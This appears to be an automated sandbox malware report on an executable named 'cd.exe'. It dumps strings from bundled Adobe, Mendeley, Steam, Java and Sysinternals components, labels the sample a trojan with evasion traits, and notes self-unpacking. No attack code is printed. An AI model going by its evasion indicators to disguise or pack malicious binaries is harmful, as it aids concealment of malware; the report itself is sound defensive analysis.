handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfApplication{A6EADE66-0000-0000-484E-7E8A45000000}SOFTWARE\Adobe\Acrobat Reader\{AC76BA86-0000-0000-7761-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}{AC76BA86-0000-0000-BA7E-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\VersionMajorVersionMinor12VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\.0\InstallerPATHVersionMajorVersionMinor1207760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe 
Acrobat\.0DC\InstallerENU_GUIDPATHInstallLocationAcroExch.Document.DC.pdfTrunk{AC76BA86-0000-0000-7760-7E8A45000000}BetaDCVersionMajorSOFTWARE\Google\Chrome\SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajSOFTWARE\Google\Chrome\NativeMessagingHosts\com.adobe.acrobat.chrome_webcapturehttps://clients2.google.com/service/update2/crxupdate_urlBrowser\WCChromeExtn\manifest.jsonAcrobat.Document.SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajAcrobat.Document.11.pdfSOFTWARE\Google\Chrome\NativeMessagingHosts\.com.adobe.acrobat.chrome_webcaptureSOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorLowerCoExVersionSOFTWARE\Adobe\Adobe Acrobat\DC\InstallerCoExRepairDone\NotificationAppxSOFTWARE\Adobe\Acrobat Reader\\DC\SOFTWARE\Adobe\Acrobat Reader\\DC\Installer\AppVersionAppVersionINSTALLUWPAPP=1 REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 /qn/i msiexec.exe ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn/i msiexec.exeAppDoNotTakePDFOwnershipAtLaunchAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstoreAdobe Reader XIRtlGetVersionntdll.dll\??\UNC\\\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrd
              Source: cd.exeBinary string: Gbad array new lengthmap/set too longstring too longVersionMajor{AC76BA86-0000-0000-7760-7E8A45000000}InstallLocationAcrobat\Acrobat.exeiEntitlementLevelbLoginStatusTrunkBetaDC\AVEntitlementSOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorVersionMinorInstallLocationAcrobat\Acrobat.exe#32770Learn MoreOkMsgBoxHookMsgBoxHookMsgBoxHookMsgBoxHook0x%XS:(ML;;NW;;;LW)rdrCEF_alternate_desktop_alr_alternate_desktop_rdrCEF_alternate_desktop_alr_alternate_desktop_\S-1-16-4096S:(ML;CIOI;NW;;;LW)TMP=TMP=TEMP=TEMP=LOCALAPPDATA=LOCALAPPDATA===invalid string positionvector too longSOFTWARE\Adobe\Adobe Acrobat\DC\Installer\bIsSingleClientAppbIsSCAcroAppInstalledSCAPackageLevelIsAcrInstalledInRdrModeSeShutdownPrivilegekernel32.dllGetNamedPipeServerProcessIdGetNamedPipeClientProcessIdS:(ML;;NW;;;LW)D:P(D;;GA;;;NU)(D;;GA;;;AN)(A;;GA;;;)(A;;GA;;;AC)\\.\pipe\AIPC_SRV\\\.\pipe\AIPC_CLI\Global\IEACROBATSTARTIPCNAMEDPIPECOMGlobal\ARM Update MutexGlobal\Acro Update MutexC:\thsnYaVieBodaTsnIorcAeBoda\\.\pipe\32B6B37A-4A7D-4e00-95F2-6F0BF3DE3E00SOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockDownbEnableEventViewerLoggingSoftware\Adobe\Acrobat Reader\DC\PrivilegedbEnableEventViewerLoggingAdobe ReaderDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsHandleAcroURLAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exe\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\list too 
long4057363broker_pdfshell_sh/if/id %uAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exe\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Software\Adobe\Acrobat Reader\DC\FeatureStateSoftware\Adobe\Adobe Acrobat\DC\FeatureStateatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClient\??\\Device\atlTraceDBProvider\\?\UNC\\??\UNC\/?/UNC/atlTraceSnapin\?\UNC\\??\pipe\\??\mailslot\atlTraceNotImpl\\?\\\.\\\atlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPIAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeSMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLib%d.%u.%d/cr/bSOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockdownbEnforceReadRestrictionsSOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockdownbEnableAlternateLaunchDesktopSoftware\Adobe\Adobe
              Source: cd.exeBinary string: Software\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Acrobat /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770/\ADelRCP.exeClick on 'Change' to select default PDF handler.pdfpropertiesShowAppPickerForPDF.exeProgram ManagerPROGMANClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfApplicationSOFTWARE\Adobe\Adobe Acrobat\{A6EADE66-0000-0000-484E-7E8A45000000}SOFTWARE\Adobe\Acrobat Reader\{AC76BA86-0000-0000-7761-7E8A45000000}{AC76BA86-0000-0000-7760-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-BA7E-7E8A45000000}VersionMajorVersionMinor12VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\.0\InstallerPATHVersionMajorVersionMinor1207760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat 
Reader\.0DC\InstallerENU_GUIDPATHInstallLocationAcrobat.Document.DC.pdfTrunk{AC76BA86-0000-0000-7760-7E8A45000000}BetaDCVersionMajorSOFTWARE\Google\Chrome\SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajSOFTWARE\Google\Chrome\NativeMessagingHosts\com.adobe.acrobat.chrome_webcapturehttps://clients2.google.com/service/update2/crxupdate_urlBrowser\WCChromeExtn\manifest.jsonAcrobat.Document.SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajAcrobat.Document.11.pdfSOFTWARE\Google\Chrome\NativeMessagingHosts\.com.adobe.acrobat.chrome_webcaptureSOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorLowerCoExVersionSOFTWARE\Adobe\Adobe Acrobat\DC\InstallerCoExRepairDone\RDCNotificationAppx\ADCNotificationAppx\NotificationAppxSOFTWARE\Adobe\Adobe Acrobat\\DC\SOFTWARE\Adobe\Adobe Acrobat\\DC\Installer\AppVersionAppVersionINSTALLUWPAPP=1 REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 IS_COEX_REPAIR=1 /qn/i msiexec.exe/i AppDoNotTakePDFOwnershipAtLaunch ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qnmsiexec.exeAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstore.sequ.rmf.bpdxAdobe Acrobat XI ProRtlGetVersionntdll.dll\??\UNC\\\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Dev
              Source: cd.exeBinary string: O 3Eg_interceptionsNtMapViewOfSectionNtUnmapViewOfSectiong_originals\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Invalid Object foundD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\filesystem_policy.ccrequested path: actual path: Unexpected handle for path: Unexpected handle\/?/?\?:?:\\/?/?\UNC\Failed to process path (recursion detected): error code:Failed to process path:Unexpected error in path processing of:Unexpected error in source path processing of:::$DATA:$I30:$INDEX_ALLOCATION::$INDEX_ALLOCATION\\.\pipe\\\.\mailslot\Invalid path: \??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\\?\pipe\\Device\NamedPipe\SameObject check failed: D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\named_pipe_policy.ccntdll.dllkernel32.dllNtAllocateVirtualMemoryNtCloseNtDuplicateObjectNtFreeVirtualMemoryNtProtectVirtualMemoryNtQuerySectionNtQueryVirtualMemoryNtSignalAndWaitForSingleObjectNtWaitForSingleObjectRtlAllocateHeapRtlAnsiStringToUnicodeStringRtlCreateHeapRtlCreateUserThreadRtlDestroyHeapRtlFreeHeap_strnicmpstrlenwcslenmemcpy_wcsnicmpswprintf_sNtQueryInformationThreadNtSetInformationFileNtDeleteValueKeyNtCreateMutantNtOpenMutantNtOpenSectionNtAddAtomNtFindAtomNtDeleteAtomNtQueryInformationAtomg_ntNtSetInformationThreadNtOpenThreadTokenNtOpenThreadTokenEx\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\NtSuspendProcessNtResumeProcessNtCreateProcessExntdll.dllInitializeProcThreadAttributeListUpdateProcThreadAttributeCreateProcessWAction: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\process_thread_policy.ccapp name: command line: \??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ for: Unexpected 
D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\registry_policy.ccReal path: CreateKeyOpenKey\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Handle AccessCheck failed: D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\signed_policy.cc\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\NtQuerySymbolicLinkObjectNtOpenSymbolicLinkObject%d\Sessions\BNOLINKSNtCreateEventNtOpenEvent\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
              Source: cd.exeBinary string: \??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Ntdll.dllNtQueryInformationProcessSTATIC_acroS_winAcroPDF.dllAcroPDFImpl.dllNPPdf32.dllPDFPrevHndlr.dllPDFPrevHndlrShim.dllPDFThumbHndlr.dllPDFShell.dllPDFPropHndlr.dllAcroSBL/b/id/id4057363/if%s_%lu_%lu/acGeckoPluginWindowplugin-container.exe4021007AcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeSTATICswBrowser|rdr|\Javascripts\JSByteCodeWin.bin|rdr|\AdobeUpdater.dll|sys|\ddraw.dll|sys|\dciman32.dllAdobeReaderSpeedLaunchCmdWndSOFTWARE\Adobe\Acrobat Reader\DC\AcroSpeedLaunchAcrobatSDIWindowAdobeAcrobatAcrobatTimerWndAcrobat runningMcShieldAvSynMgrnavapsvcAntiVirServiceAVPekrnIsVirusCheckerPresentServicesActivefound servicerunningIsVirusCheckerPresent doneAbortWM_CLOSEerr in TimeoutOrExitWaitUntilTimeoutOrMustExitOrVirusCheckerPresenterr in checkerSetThreadPriority worker thread lownot all ops, go into vc modewaitingmsvcr100.dllmsvcp100.dlldo Opsworker throw!worker doneTerminate thread!
              Source: classification engine; Classification label: mal100.spre.troj.evad.winEXE@4/27@6/5
              Source: C:\Program Files\internet explorer\iexplore.exe; File read: C:\Users\desktop.ini
              Source: cd.exeString found in binary or memory: /cite/word/install
              Source: cd.exeString found in binary or memory: Couldn't find documents: You have selected documents from both My Library a Shared Group, or from multiple Shared Groups, which is not supported.Documents in multiple groupsPlease select the documents you wish to cite.importing %1 documents from plugin into ??geometry/newLibrarySplittergeometry/horizontalSplittergeometry/verticalSplitterSynchronizing - Step %1 of %2GroupFilterCollectionDeletedFilter1trigger()Synchronizing Zotero - Step %1 of %22duplicateSearchStarted(WorkerJob::Pointer)1highlightAndScrollTo(QList<Document::Pointer>)2allJobsFinished(QList<Document::Pointer>)Invite/invite/?dgcid=Mendeley_Desktop_Invite-colleagues/cite/word/install/importshowSignInmendeley://loginshowJoinMendeleyFormmendeley://registerDelete this document from your library?Delete %1 documents from your library?
              Source: cd.exeString found in binary or memory: https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guides
              Source: cd.exeString found in binary or memory: 1openHelpGuides()Help Guides1openMendeleyWebsite()Mendeley Website1openFAQ()FAQ1openContactSupport()Contact SupportCheck for UpdatesCheck Now1toggleCheckForPreviewUpdates()Create Backup...1openMendeleyPrivacyPolicy()Privacy Policy1openMendeleyTandCs()Terms and Conditions1showAbout()https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guideshttps://www.mendeley.com?dgcid=Mendeley_Desktop_Help-menu-websitehttps://www.elsevier.com/legal/elsevier-website-terms-and-conditionshttps://www.elsevier.com/legal/privacy-policyhttps://service.elsevier.com/app/home/supporthub/mendeley/?dgcid=Mendeley_Desktop_Help-menu-FAQhttps://service.elsevier.com/app/contact/supporthub/mendeley?dgcid=Mendeley_Desktop_Help-menu-Contact-SupportOpt-out of Experimental ReleasesOpt-in to Experimental Releases
              Source: cd.exeString found in binary or memory: recently-added
              Source: cd.exeString found in binary or memory: 1timeout()1showDocumentView()all-documentsrecently-addedmy-publicationsfavoritesfavouritesunsortedselectExistingGroupByIdactiongroupIdtabNameoverviewmembersInvalid group tab namefailed to select group1syncProgressChanged(QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>)2progressChanged(QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>)1updateRecentlyRead()selectExistingDocumentByIdidfileToOpenselectExistingFolderByIdfolderIdcan't fetch unknown document No document found matching the id1showStyleError(StylesFetcher::DownloadFromUrlError,QString)1selectStyle(QString)Style selected - %1Cannot install - %1. Error: %2No folder found matching the remote idMainWindowController::selectFilterByName: Can't find the filter showDocumentViewsetDocumentPropertiesPaneVisibilityselectMetadataTabselectTagsAndNotesTabselectFilterBySlugselectFilterByNameselectDocumentRowselectMainTabselectDocumentByIdselectGroupByIdH
              Source: cd.exeString found in binary or memory: :/images/onboarding/bubbles/add_copy.png
              Source: cd.exeString found in binary or memory: Try Mendeley <a href="https://mendeley.com/reference-management/web-importer/#id_1?dgcid=Mendeley_Desktop_Onboarding-Add-Importer"><b>Web Plugin</b></a> to import documents in just one click
              Source: cd.exeString found in binary or memory: <html><head/><body><p><a href="https://www.mendeley.com/guides/using-citation-editor?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">Cite</span></a> your Mendeley references in Microsoft Word<sup>&reg;</sup> or LibreOffice<sup>&trade;</sup></p></body></html>
              Source: cd.exeString found in binary or memory: <html><head/><body><p>Discover how to <a href="https://www.mendeley.com/guides/desktop/04-read-highlight-annotate?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">highlight and annotate</span></a> documents in your library</p></body></html>
              Source: cd.exeString found in binary or memory: :/images/onboarding/bubbles/next.pngAdd and CreateUserGuidePopoverWidgetHide the Guidance PopupAlt+CClick here to <b>import</b> documents and folders to your library or <b>create new</b> entries manually.or importImport other librariesTry Mendeley <a href="https://mendeley.com/reference-management/web-importer/#id_1?dgcid=Mendeley_Desktop_Onboarding-Add-Importer"><b>Web Plugin</b></a> to import documents in just one clickYour Mendeley Library is backed up to the Mendeley Cloud every time you sync so you can access it on Mendeley Web Library, Mendeley Mobile or other installations of Mendeley Desktop. You can manage synchronization of your file attachments here.Click the help button to find out more about Mendeley and learn how to cite, annotate and collaborate.Learn how to<html><head/><body><p><a href="https://www.mendeley.com/guides/using-citation-editor?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">Cite</span></a> your Mendeley references in Microsoft Word<sup>&reg;</sup> or LibreOffice<sup>&trade;</sup></p></body></html><html><head/><body><p>Discover how to <a href="https://www.mendeley.com/guides/desktop/04-read-highlight-annotate?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">highlight and annotate</span></a> documents in your library</p></body></html>QPushButton:pressed { border: 1px solid white; background: white; color: white; opacity: 255; }QPushButton:pressed { border: 1px solid #F6F6F6; background: #F6F6F6; color: white; opacity: 255; }UserGuidePopover1trackButtonClick()1page0AltContentBiTeXButtonClicked()1page0AltContentEndNoteButtonClicked()1page0AltContentRISButtonClicked()1display()2displaySignal():/images/onboarding/bubbles/next.png:/images/onboarding/bubbles/close-button.pngStorage: Local & CloudThe help button will always be 
hereUserGuidePopover_Page%1unverifiedH
              Source: cd.exeString found in binary or memory: :/images/onboarding/bubbles/next.pngAdd and CreateUserGuidePopoverWidgetHide the Guidance PopupAlt+CClick here to <b>import</b> documents and folders to your library or <b>create new</b> entries manually.or importImport other librariesTry Mendeley <a href="https://mendeley.com/reference-management/web-importer/#id_1?dgcid=Mendeley_Desktop_Onboarding-Add-Importer"><b>Web Plugin</b></a> to import documents in just one clickYour Mendeley Library is backed up to the Mendeley Cloud every time you sync so you can access it on Mendeley Web Library, Mendeley Mobile or other installations of Mendeley Desktop. You can manage synchronization of your file attachments here.Click the help button to find out more about Mendeley and learn how to cite, annotate and collaborate.Learn how to<html><head/><body><p><a href="https://www.mendeley.com/guides/using-citation-editor?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">Cite</span></a> your Mendeley references in Microsoft Word<sup>&reg;</sup> or LibreOffice<sup>&trade;</sup></p></body></html><html><head/><body><p>Discover how to <a href="https://www.mendeley.com/guides/desktop/04-read-highlight-annotate?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">highlight and annotate</span></a> documents in your library</p></body></html>QPushButton:pressed { border: 1px solid white; background: white; color: white; opacity: 255; }QPushButton:pressed { border: 1px solid #F6F6F6; background: #F6F6F6; color: white; opacity: 255; }UserGuidePopover1trackButtonClick()1page0AltContentBiTeXButtonClicked()1page0AltContentEndNoteButtonClicked()1page0AltContentRISButtonClicked()1display()2displaySignal():/images/onboarding/bubbles/next.png:/images/onboarding/bubbles/close-button.pngStorage: Local & CloudThe help button will always be 
hereUserGuidePopover_Page%1unverifiedH
              Source: cd.exeString found in binary or memory: Please upgrade to a supported version of MS Word and re-install the Mendeley plugin through Mendeley Desktop's 'Tools' menu. Sorry for the inconvenience.
              Source: cd.exeString found in binary or memory: 1updateWordPlugin()1uninstallWordPlugin()Please upgrade to a supported version of MS Word and re-install the Mendeley plugin through Mendeley Desktop's 'Tools' menu. Sorry for the inconvenience.The Mendeley plugin requires Microsoft Word %1 or later.
              Source: cd.exeString found in binary or memory: documents-add
              Source: cd.exeString found in binary or memory: folder-add
              Source: cd.exeString found in binary or memory: 333?editMenuSeparatorviewerActions.selectionMenuviewerActions.highlightMenuviewerActions.zoomModeMenudocuments-addAddnewDocumentActionImport additional documents to the current collectionaddFilesActionaddFolderActionWatch FolderwatchFolderActionAdd Entry ManuallyaddManualEntryActionemptyEmptyemptyTrashActionDelete all documents from the Trashdocument-deleteremoveDocumentActionMove the selected documents to the TrashremoveDocumentActionTrashContextDelete the selected documents from the TrashrestoreRestoreRestore DocumentsrestoreDocumentActionRestore the selected documents to their original locationRemove from FolderremoveFromFolderActionRemove the selected documents from this folderRename Document Files...renameDocumentActionfolder-addCreate FolderNew Folder...newFolderActionCreate a new folderNew GroupNew Group...newGroupActionCreate a new groupfolder-removeRemove CollectionRemoveCollectionActionRemove the current collectioneditSettingsActionRename Collection...renameFolderActionmagnifiercatalogSearchActionMendeley Catalog Searchrelated-documentsRelatedrecommendActionRecommend related documentsSyncSynchronize LibrarysynchronizeActionSynchronize your library with Mendeley WebHelpHelp ContentshelpActionOpen the Online Help Guide for MendeleyFindfindActionFind NextfindNextActionFind PreviousfindPreviousActionselectAllActionciteCitesendCitationActionSend citation to plugincancelcancelCitationActionCancel sending citation to pluginEdit...editDocumentActionactionNotDuplicatesUpdate DetailslookupMetadataActionfullscreenFullscreenfullScreenActionzoomActionzoom-inZoom InzoomInActionzoom-outZoom OutzoomOutActionrotate-leftRotate LeftrotateAnticlockwiseActionrotate-rightRotate RightrotateClockwiseActionpanPanpanActionfit-pageFit to PagezoomModeFitPageActionfit-widthFit to WidthzoomModeFitWidthActionzoomModeCustomselectActionselect-rectangleSelect RectangleselectRectangleActionselect-textSelectSelect 
TextselectFlowActionColorSelect ColorselectColorActionhighlightActionhighlight-textHighlightHighlight TexthighlightTextActionhighlight-rectHighlight RectanglehighlightRectangleActionnoteNoteAdd NoteaddNoteActioncopyActionpasteAction:/icons/64x64/actions/%1/%2.png:/icons/toolbar/%1/%2.png:/icons/toolbar/%1/%2-active.png:/icons/16x16/actions/%1.png
              Source: cd.exe String found in binary or memory: The service logs events immediately and the driver installs as a boot-start driver to capture activity from early in the boot that the service will write to the event log when it starts.
              Source: cd.exe String found in binary or memory: Try '%ls --help' for more information.
              Source: cd.exe String found in binary or memory: Commands : /install - Installs Steam Client Service
              Source: cd.exe String found in binary or memory: /installscript <file> <appid> - Runs a Steam game install script
              Source: cd.exe String found in binary or memory: /installscript
              Source: cd.exe String found in binary or memory: /installscript failed on: %s: %d
              Source: cd.exe String found in binary or memory: /install
              Source: cd.exe String found in binary or memory: /install service install failed
              Source: cd.exe String found in binary or memory: /setupsteam <command line> - Runs SteamSetup.exe/hide/installscript/installscript failed on: %s: %d
              Source: cd.exe String found in binary or memory: /install/install service install failed
              Source: cd.exe String found in binary or memory: /Install
              Source: cd.exe String found in binary or memory: /Stop
              Source: cd.exe String found in binary or memory: /Install/Uninstall/Start/Stop/RunAsService
              Source: cd.exe String found in binary or memory: ,ZJAll AccessRead/WriteExecuteQuery ValueSet ValueCreate Sub KeyEnumerate Sub KeysNotifyCreate LinkWOW64_ResWOW64_32KeyWOW64_64KeyGeneric Read/Write/ExecuteGeneric Read/WriteGeneric Read/ExecuteGeneric Write/ExecuteGeneric ReadGeneric WriteGeneric ExecuteRead Data/List DirectoryWrite Data/Add FileAppend Data/Add Subdirectory/Create Pipe InstanceRead EAWrite EAExecute/TraverseDelete ChildRead AttributesWrite AttributesRead ControlWrite DACWrite OwnerSynchronizeAccess System SecurityMaximum Allowedkernel32.dllSD\fltlib.dll%llx%lf%s%07d%02u:%02u:%02u.%07u%02u:%02u:%02u%I64d0x%I64x-1%I64u KB MB GBWindows 2000Windows XPWindows XP x64Windows Server 2003Windows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 8Windows Server 2012Windows 8.1Windows Server 2012 R2Windows 10Windows Server 2016Windows %d.%d (build %d.%d)%08x:%08x%02X64-bit32-bit%x:%x:%x:%x:%x:%x:%x:%x%d.%d.%d.%d:%d:None
              Source: cd.exe String found in binary or memory: -help
              Source: cd.exe String found in binary or memory: sun/launcher/LauncherHelper
              Source: cd.exe String found in binary or memory: Error: Corrupt jvm.cfg file; cycle in alias list.ERRORError: Unable to resolve VM alias %sWarning: %s VM not supported; %s VM will be usedError: %s VM not supported-version-fullversion-help-?-jar-X-XX:NativeMemoryTracking=%s%d=%s%s%dTRACER_MARKER: NativeMemoryTracking: env var is %s
              Source: cd.exe String found in binary or memory: sun/launcher/LauncherHelper(Z[B)Ljava/lang/String;makePlatformStringjava/lang/String(ZILjava/lang/String;)Ljava/lang/Class;checkAndLoadMain%ld micro seconds to load main class
              Source: cd.exe String found in binary or memory: browser-startup-dialog
              Source: cd.exe String found in binary or memory: enable-service-binary-launcher
              Source: cd.exe String found in binary or memory: gpu-launcher
              Source: cd.exe String found in binary or memory: gpu-sandbox-start-early
              Source: cd.exe String found in binary or memory: gpu-startup-dialog
              Source: cd.exe String found in binary or memory: ppapi-plugin-launcher
              Source: cd.exe String found in binary or memory: ppapi-startup-dialog
              Source: cd.exe String found in binary or memory: renderer-startup-dialog
              Source: cd.exe String found in binary or memory: utility-startup-dialog
              Source: cd.exe String found in binary or memory: gpu2-startup-dialog
              Source: cd.exe String found in binary or memory: --start-crash-handler
              Source: cd.exe String found in binary or memory: QVersionNumbera+CONOUT$--start-crash-handlerRadareOrgCutterQList
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
              Source: cd.exe Static file information: File size 3922432 > 1048576
              Source: cd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\s\Win32\Release\logonsessions.pdb source: cd.exe
              Source: Binary string: c:\stream\develop\Regionhunt.pdb source: cd.exe
              Source: Binary string: D:\a\1\s\Win32\Release\RamMap.pdb source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb))) source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb666 source: cd.exe
              Source: Binary string: C:\agent\_work\93\s\Win32\Release\autoruns.pdb source: cd.exe
              Source: Binary string: D:\a\1\s\Win32\Release\adrestore.pdb source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb source: cd.exe

              Data Obfuscation:

              Detected unpacking (overwrites its own PE header)
              Source: C:\Users\user\Desktop\cd.exe Unpacked PE file: 1.2.cd.exe.400000.0.unpack
              Detected unpacking (changes PE section rights)
